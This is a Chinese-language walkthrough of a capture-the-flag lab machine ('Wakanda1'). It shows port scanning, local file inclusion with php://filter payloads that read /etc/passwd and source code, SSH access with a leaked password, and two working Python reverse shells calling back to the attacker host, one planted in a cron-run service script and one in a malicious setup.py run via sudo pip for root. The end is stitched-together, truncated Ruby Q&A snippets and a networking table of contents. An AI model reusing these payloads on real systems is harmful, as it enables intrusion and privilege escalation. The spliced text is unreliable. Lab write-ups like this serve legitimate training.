信息收集非常重要,有了信息才能知道下一步该如何进行,接下来将用 nmap 来演示信息收集
由于本项目环境是 nat 模式需要项目 IP 地址,扫描挖掘本地的 IP 地址信息:
本机 IP 为:192.168.40.177。
发现本 kali ip 为 40 段!用 40 段进行全网段扫描:
nmap -sP 192.168.40.0/24
Nmap scan report for localhost (192.168.40.190)
发现项目 IP 地址:192.168.40.190。
进行 namp 端口服务枚举:
nmap -p- 192.168.40.19
得到开放的端口信息:
80/tcp open http
111/tcp open rpcbind
3333/tcp open dec-notes ssh OpenSSH 6.7p1
47046/tcp open unknown
开启了 80、111 和 3333 端口,继续探测下端口信息:
nmap 192.168.40.190 -p80,111,3333,35523 -A -T5
可以详细看到端口开启的版本信息,就从 web 页面信息枚举信息!
访问 web 页面:
http://192.168.40.190/
没有什么可用信息!扫描下目录枚举下信息。
dirb 扫描目录:
dirb http://192.168.40.190/
dirb 扫出的目录都是访问空白页面!
查看主页的静态源码发现:
?lang= ,出现这种形式,很可能是 sql 注入或文件包含
访问下该目录:
http://192.168.40.190/?lang=fr
发现跳转回了主页
利用 dirb 扫描:
dirb http://192.168.40.190/?lang=
发现存在 fr 和 index
http://192.168.40.190/?lang=fr
http://192.168.40.190/?lang=index
尝试访问 fr.php 和 index.php,发现都跳转回主页!
http://192.168.40.190/?lang=fr
通过抓包分析:curl 测试是否存在文件包含响应
curl -i http://192.168.40.190/?lang=fr
curl -i http://192.168.40.190/?lang=index
-i ----include 在输出中包含协议响应头
对比发现:
fr :HTTP/1.1 200 OK
index:HTTP/1.0 500 Internal Server Error
疑似存在文件包含,该文件底层可能存在 inclu()函数,开始测试!
通过过滤器方法绕过枚举出需要读的文件信息。
PHP 存在四种过滤器:PHP 过滤器用于验证和过滤来自非安全来源的数据,比如用户的输入。1)字符串过滤器:字符串过滤器就是用户输入的内容会转换为大写、小写、ROT13 字符、或者去除 php 标记等功能。2)转换过滤器:就是用户输入的数据转换为 base64 编码和解码功能,还有将字符串转换为 8-bit 字符串功能。3)压缩过滤器:zip 中有 zlib 和 bzip2 等函数协议,功能就是在用户传输中会有压缩文件做一些压缩函数转换功能。4)加密过滤器 mcrypt 是 php 里面重要的加密支持扩展库,主要是用 mcrypt 扩展库中各种加密函数对用户输入内容进行转换功能。
那么不管是哪些过滤器,都可以尝试下面六种方法去操作测试是否可以进行文件包含:
/index.php?page=/etc/passwd
/index.php?page=.. /../../../../../etc/passwd
index.php?page=php://filter/read=
/index.php?page=php://filter/convert.base64-encode/resource=
/index.php?page=zip://
page=data://
用过滤器测试下文件包含:
curl http://192.168.40.190/?lang=php://filter/convert.base64-encode/resource=index | head -n 1 | base64 -d
获得密码:
Niamey4Ever227!!!
但是不知道是哪个用户的密码,爆破 ssh 获得用户名!
cewl http://192.168.40.190/
利用实战常用的:gorailgun.exe
记得修改下端口 ,项目 ssh 端口为 3333
成功获得用户:mamadou
ssh mamadou@192.168.40.190 -p 3333
Niamey4Ever227!!!
输入进来发现这是:Python 2.7.9 的命令框
通过 python 获得 bash 正常 shell:
import pty;
pty.spawn('/bin/bash');
获得正常 shell!
开启 http 服务上传扫描脚本 linpeas.sh:
python -m SimpleHTTPServer 8081
wget http://192.168.40.177:8081/linpeas.sh
上传成功!
赋权并执行脚本,linpeas.sh 信息枚举:
chmod +x linpeas.sh
./linpeas.sh
发现如下新信息
发现新用户是 1002,说明包含了 2 个权限uid=1001(devops) gid=1002(developer) groups=1002(developer)
root 权限 pip,PIP 是 Python 包或模块的包管理器,包含模块所需的所有文件rwxr-sr-- 1 root developer 281 Feb 27 2015 /usr/bin/pip
1)mamadou 用户信息枚举
利用 find 针对 mamadou 查看可运行权限文件:
/ ---反斜杠从根目录开始查询
-user mamadou ---搜索普通该用户权限的文件
2>&1 ----将所有错误信息重定向不输出过滤掉
-v ---就是过滤错误的输出
发现 flag1:
cat /home/mamadou/flag1.txt
Flag : d86b9ad71ca887f4dd1dac86ba1c4dfc
2)devops 用户信息枚举
通过前面脚本枚举还发现存在另一个用户:devops,也利用 find 针对 devops 查看其可运行权限文件:
find / -user devops 2>&1 | grep -v "Permission denied\|proc"
返回三个信息,具体查看下
/srv/.antivirus.py
/tmp/test
/home/devops/flag2.txt
这里返现三个可疑信息:
尝试打开 flag2.txt:cat /home/devops/flag2.txt
提示无权限打开!
尝试打开 antivirus.py:
cat /srv/.antivirus.py
发现这是一个可读可写的 python 脚本!
open('/tmp/test','w').write('test')
查看下 antivirus 是否存在计划任务启动该脚本:
find / -name *antivirus* 2>&1 | grep -v "Permission denied\|proc"
发现存在 antivirus.service 服务!
查看下该服务内容:
cat /lib/systemd/system/antivirus.service
提示存在该服务存在计划任务,每 5 分钟 devops 用户执行一次
RestartSec=300 ---300秒运行一次
User=devops ---这是devops用户运行
接下来利用该计划任务来编译反弹 shell!
本地开启 nc 端口:
nc -tvlp 9999
nano 写入反弹 shell
nano /srv/.antivirus.py
写入以下shell:
#!/usr/bin/python
def con():
import socket, time,pty, os
host='192.168.40.177'
port=9999
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.settimeout(10)
s.connect((host,port))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
os.putenv("HISTFILE",'/dev/null')
pty.spawn("/bin/bash")
s.close()
con()
等 5 分钟成功反弹 devops 用户 shell!
cat /etc/group
developer1002: ---可看到还存在 group 组里的 developer
利用 find 针对 developer 查看可运行权限文件:
find / -group developer 2>&1 | grep -v "Permission denied\|proc"
发现存在:/usr/bin/pip 可运行文件和 flag2
cat /home/devops/flag2.txt
Flag 2 : d8ce56398c88e1b4d9e5f83e64c79098
在整个目录中枚举 devops:
grep -rn / -e devops 2>&1 | grep -v "Permission denied\|proc"
没发现新的东西,但是可看到 devops 的 ID 为 1002 是共用的!
/etc/subgid:11:devops:755360:65536
/etc/group:56:devops:x:1001:
/etc/passwd:29:devops:x:1001:1002:,,,:/home/devops:/bin/bash
/etc/subuid:11:devops:755360:65536
尝试 sudo 提权:
sudo -l
提示用户可以在/usr/bin/pip 执行 sudo
User devops may run the following commands on Wakanda1: (ALL) NOPASSWD: /usr/bin/pip
pip 可执行 sudo 提权,那就利用 pip 写入 py 脚本运行
开启 nc 反弹 shell:
nc -vlp 4455
本地添加设置脚本 setup.py:
将 host 更改为本地 kali 地址,端口随拟。
gedit setup.py
写入以下py脚本:
from setuptools import setup
import socket,subprocess,os
def con():
import socket, time,pty, os
host='192.168.40.177'
port=4455
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.settimeout(10)
s.connect((host,port))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
os.putenv("HISTFILE",'/dev/null')
pty.spawn("/bin/bash")
s.close()
con()
setup(name="root", version="1.0")
配置成功!
到 tmp 目录下上传 setup.py 脚本至靶机:
cd /tmp
wget http://192.168.40.177:8081/setup.py
上传成功!
sudo 运行脚本 setup.py:
sudo pip install setup.py .
成功获得反弹 shell!
获得 flag:
cd /root
cat root.txt
flag:821ae63dbe0c573eff8b69d451fb21bc
poc:[https://github.com/0x00-0x00/FakePip](https://github.com/0x00-0x00/FakePip)
用代理下载 FakePip 包:
proxychains git clone https://github.com/0x00-0x00/FakePip.git
下载成功!
查看脚本机制并配置参数:
cd FakePip
cat setup.py
gedit setup.py
将 lhost 改为本地 kali 地址,端口可不变:
192.168.40.177
13372
如何在buildr项目中使用Ruby?我在很多不同的项目中使用过Ruby、JRuby、Java和Clojure。我目前正在使用我的标准Ruby开发一个模拟应用程序,我想尝试使用Clojure后端(我确实喜欢功能代码)以及JRubygui和测试套件。我还可以看到在未来的不同项目中使用Scala作为后端。我想我要为我的项目尝试一下buildr(http://buildr.apache.org/),但我注意到buildr似乎没有设置为在项目中使用JRuby代码本身!这看起来有点傻,因为该工具旨在统一通用的JVM语言并且是在ruby中构建的。除了将输出的jar包含在一个独特的、仅限ruby
使用带有Rails插件的vim,您可以创建一个迁移文件,然后一次性打开该文件吗?textmate也可以这样吗? 最佳答案 你可以使用rails.vim然后做类似的事情::Rgeneratemigratonadd_foo_to_bar插件将打开迁移生成的文件,这正是您想要的。我不能代表textmate。 关于ruby-使用VimRails,您可以创建一个新的迁移文件并一次性打开它吗?,我们在StackOverflow上找到一个类似的问题: https://sta
在选择我想要运行操作的频率时,唯一的选项是“每天”、“每小时”和“每10分钟”。谢谢!我想为我的Rails3.1应用程序运行调度程序。 最佳答案 这不是一个优雅的解决方案,但您可以安排它每天运行,并在实际开始工作之前检查日期是否为当月的第一天。 关于ruby-如何每月在Heroku运行一次Scheduler插件?,我们在StackOverflow上找到一个类似的问题: https://stackoverflow.com/questions/8692687/
我正在编写一个小脚本来定位aws存储桶中的特定文件,并创建一个临时验证的url以发送给同事。(理想情况下,这将创建类似于在控制台上右键单击存储桶中的文件并复制链接地址的结果)。我研究过回形针,它似乎不符合这个标准,但我可能只是不知道它的全部功能。我尝试了以下方法:defauthenticated_url(file_name,bucket)AWS::S3::S3Object.url_for(file_name,bucket,:secure=>true,:expires=>20*60)end产生这种类型的结果:...-1.amazonaws.com/file_path/file.zip.A
我在我的Rails项目中使用Pow和powifygem。现在我尝试升级我的ruby版本(从1.9.3到2.0.0,我使用RVM)当我切换ruby版本、安装所有gem依赖项时,我通过运行railss并访问localhost:3000确保该应用程序正常运行以前,我通过使用pow访问http://my_app.dev来浏览我的应用程序。升级后,由于错误Bundler::RubyVersionMismatch:YourRubyversionis1.9.3,butyourGemfilespecified2.0.0,此url不起作用我尝试过的:重新创建pow应用程序重启pow服务器更新战俘
我已经像这样安装了一个新的Rails项目:$railsnewsite它执行并到达:bundleinstall但是当它似乎尝试安装依赖项时我得到了这个错误Gem::Ext::BuildError:ERROR:Failedtobuildgemnativeextension./System/Library/Frameworks/Ruby.framework/Versions/2.0/usr/bin/rubyextconf.rbcheckingforlibkern/OSAtomic.h...yescreatingMakefilemake"DESTDIR="cleanmake"DESTDIR="
我想在Ruby中创建一个用于开发目的的极其简单的Web服务器(不,不想使用现成的解决方案)。代码如下:#!/usr/bin/rubyrequire'socket'server=TCPServer.new('127.0.0.1',8080)whileconnection=server.acceptheaders=[]length=0whileline=connection.getsheaders想法是从命令行运行这个脚本,提供另一个脚本,它将在其标准输入上获取请求,并在其标准输出上返回完整的响应。到目前为止一切顺利,但事实证明这真的很脆弱,因为它在第二个请求上中断并出现错误:/usr/b
假设我有这个范围:("aaaaa".."zzzzz")如何在不事先/每次生成整个项目的情况下从范围中获取第N个项目? 最佳答案 一种快速简便的方法:("aaaaa".."zzzzz").first(42).last#==>"aaabp"如果出于某种原因你不得不一遍又一遍地这样做,或者如果你需要避免为前N个元素构建中间数组,你可以这样写:moduleEnumerabledefskip(n)returnto_enum:skip,nunlessblock_given?each_with_indexdo|item,index|yieldit
在Ruby中是否有Gem或安全删除文件的方法?我想避免系统上可能不存在的外部程序。“安全删除”指的是覆盖文件内容。 最佳答案 如果您使用的是*nix,一个很好的方法是使用exec/open3/open4调用shred:`shred-fxuz#{filename}`http://www.gnu.org/s/coreutils/manual/html_node/shred-invocation.html检查这个类似的帖子:Writingafileshredderinpythonorruby?
网络编程套接字网络编程基础知识理解源`IP`地址和目的`IP`地址理解源MAC地址和目的MAC地址认识端口号理解端口号和进程ID理解源端口号和目的端口号认识`TCP`协议认识`UDP`协议网络字节序socket编程接口`sockaddr``UDP`网络程序服务器端代码逻辑:需要用到的接口服务器端代码`udp`客户端代码逻辑`udp`客户端代码`TCP`网络程序服务器代码逻辑多个版本服务器单进程版本多进程版本多线程版本线程池版本服务器端代码客户端代码逻辑客户端代码TCP协议通讯流程TCP协议的客户端/服务器程序流程三次握手(建立连接)数据传输四次挥手(断开连接)TCP和UDP对比网络编程基础知识